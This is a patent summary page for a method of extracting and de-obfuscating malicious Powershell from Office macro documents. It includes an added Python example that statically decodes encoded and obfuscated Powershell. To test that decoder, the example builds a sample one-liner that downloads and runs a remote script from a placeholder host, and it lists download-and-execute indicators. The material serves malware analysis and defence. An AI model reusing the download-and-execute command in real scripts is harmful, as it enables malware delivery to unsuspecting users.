
De-obfuscation method based on Powershell script

A de-obfuscation technique for Powershell scripts, applied in the security field, addresses problems such as increasingly complex obfuscation methods, a high false positive rate, and the inability to automatically recover the original Powershell for in-depth analysis.

Pending Publication Date: 2021-03-09
ZHONGKE INFORMATION SECURITY COMMON TECH NAT ENG RES CENT CO LTD

AI Technical Summary

Problems solved by technology

[0008] The main shortcomings of the current research methods are: (1) using the detection of Office macros as a stand-in for the detection of malicious Powershell has a very high false positive rate, because normal documents also use Shell commands to call system functions; (2) the extraction of malicious Powershell scripts is still done by manual analysis, and as the number of samples using malicious Powershell increases and the obfuscation methods become more and more complicated, manual analysis alone cannot meet the requirements; (3) for an obfuscated Powershell script embedded in a document, the original Powershell cannot be obtained automatically for in-depth analysis.

Method used



Embodiment Construction

[0024] The following will clearly and completely describe the technical solutions in the embodiments of the present invention with reference to the accompanying drawings in the embodiments of the present invention. Obviously, the described embodiments are only some, not all, embodiments of the present invention. Based on the embodiments of the present invention, all other embodiments obtained by persons of ordinary skill in the art without creative efforts fall within the protection scope of the present invention.

[0025] As shown in figure 1, a Powershell script-based de-obfuscation method includes the following steps:

[0026] Step 1: Preprocess the document, provide a virtual environment in which the Office document runs automatically, and set macro security to its minimum;

[0027] Step 2: The first layer of dynamic deobfuscation, using the Hook mechanism to extract the Powershell code from the obfuscated code in the document;

[0028] Step 3: The second layer of static deobfuscat...


Abstract

The invention provides a de-obfuscation method based on the Powershell script. The method comprises the following steps: preprocessing a document, providing a virtual environment for automatic execution of an Office document, and setting macro security to its minimum; extracting the Powershell code from the obfuscated code in the document by using a Hook mechanism; and obtaining the original Powershell according to the obfuscation characteristics of the malicious Powershell in the document. The method has the beneficial effects that the Powershell embedded in a malicious document can be extracted efficiently and quickly, the original Powershell script is obtained, further in-depth analysis by security personnel is facilitated, and a contribution is made to tracing attacks and collecting evidence of them.
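The second, static layer of the method (step 3 of the embodiment and the last step of the abstract) is illustrated below with an added example written for this page, not code from the patent or its owner. It decodes a `-EncodedCommand` payload (UTF-16LE base64) and then repeatedly peels three obfuscation characteristics that macro-delivered Powershell commonly shows, `[char]` codes, `'a'+'b'` concatenation and the `-f` format operator, until the script stops changing, then pulls out URLs and cmdlet names for triage. The sample command line, the regexes and the `example.invalid` URL are constructed for the example and are assumptions.

```python
import base64
import re
from typing import Optional

# Constructed sample, not taken from any real incident: a macro-dropper style
# one-liner wrapped in -EncodedCommand (UTF-16LE base64), whose inner script is
# obfuscated with [char] codes, 'a'+'b' concatenation and the -f format operator.
INNER = ("&(\"{1}{0}\" -f 'EX','I') (&('Ne'+'w-Ob'+'ject') "
         "([char]78+[char]101+[char]116+'.WebClient'))"
         ".DownloadString('http://example.invalid/s.ps1')")   # placeholder URL
SAMPLE = ("powershell -NoP -W Hidden -EncodedCommand "
          + base64.b64encode(INNER.encode("utf-16le")).decode("ascii"))

ENC_RE = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.I)
CHAR_RE = re.compile(r"\[char\]\s*(\d+)", re.I)
CONCAT_RE = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")
FORMAT_RE = re.compile(r"""\(\s*(["'])((?:\{\d+\})+)\1\s*-f\s*((?:'[^']*'\s*,\s*)*'[^']*')\s*\)""")
URL_RE = re.compile(r"https?://[^\s'\")]+")
INDICATORS = ("IEX", "Invoke-Expression", "New-Object", "Net.WebClient",
              "DownloadString", "Start-Process")

def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the script behind -EncodedCommand (or -e/-ec/-enc), else None."""
    m = ENC_RE.search(cmdline)
    return base64.b64decode(m.group(1)).decode("utf-16le") if m else None

def fold_format(s: str) -> str:
    """Resolve ("{1}{0}" -f 'EX','I') to 'IEX'; leave malformed templates alone."""
    def repl(m):
        args = re.findall(r"'([^']*)'", m.group(3))
        try:
            return "'" + re.sub(r"\{(\d+)\}", lambda k: args[int(k.group(1))], m.group(2)) + "'"
        except IndexError:
            return m.group(0)
    return FORMAT_RE.sub(repl, s)

def static_deobfuscate(script: str) -> str:
    """Peel [char] codes, -f templates and string concatenation until nothing changes."""
    prev = None
    while prev != script:
        prev = script
        script = CHAR_RE.sub(lambda m: "'" + chr(int(m.group(1))) + "'", script)
        script = fold_format(script)
        script = CONCAT_RE.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", script)
    return script

def analyze(cmdline: str) -> dict:
    """Second-layer static pass: captured command line -> readable script + triage facts."""
    script = static_deobfuscate(decode_encoded_command(cmdline) or cmdline)
    return {"script": script, "urls": URL_RE.findall(script),
            "indicators": [t for t in INDICATORS if t.lower() in script.lower()]}
```

The fixpoint loop matters because one pass of `CONCAT_RE` only joins non-overlapping pairs, so `'a'+'b'+'c'` needs a second pass; input the hook layer captured from a sandbox run would be fed to `analyze` in place of `SAMPLE`.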

Description

Technical field

[0001] The invention relates to the field of security technology, in particular to a Powershell script-based de-obfuscation method.

Background technique

[0002] Due to the rapid development of anti-virus technology, the distribution of executable malicious programs has become more and more difficult, and attackers are increasingly inclined to use tools already present on the target computer to carry out malicious actions, which leaves fewer traces of the attack and makes detection more difficult. Since Microsoft Powershell is installed by default on Windows systems, Powershell has become an ideal tool in the attack chain of many attack groups. Malicious Powershell scripts usually play the role of downloaders, and the most common form of use is to bundle them with Office macros for intrusion [1]. As shown in figure 1, attackers usually trick users into opening Office documents (Word, Excel) through social engineering camouflage methods, and guide users to en...


Application Information

IPC(8): G06F21/53, G06F21/56
CPC: G06F21/53, G06F21/563, G06F21/566
Inventors: 胡建勋, 徐根炜, 刘元
Owner: ZHONGKE INFORMATION SECURITY COMMON TECH NAT ENG RES CENT CO LTD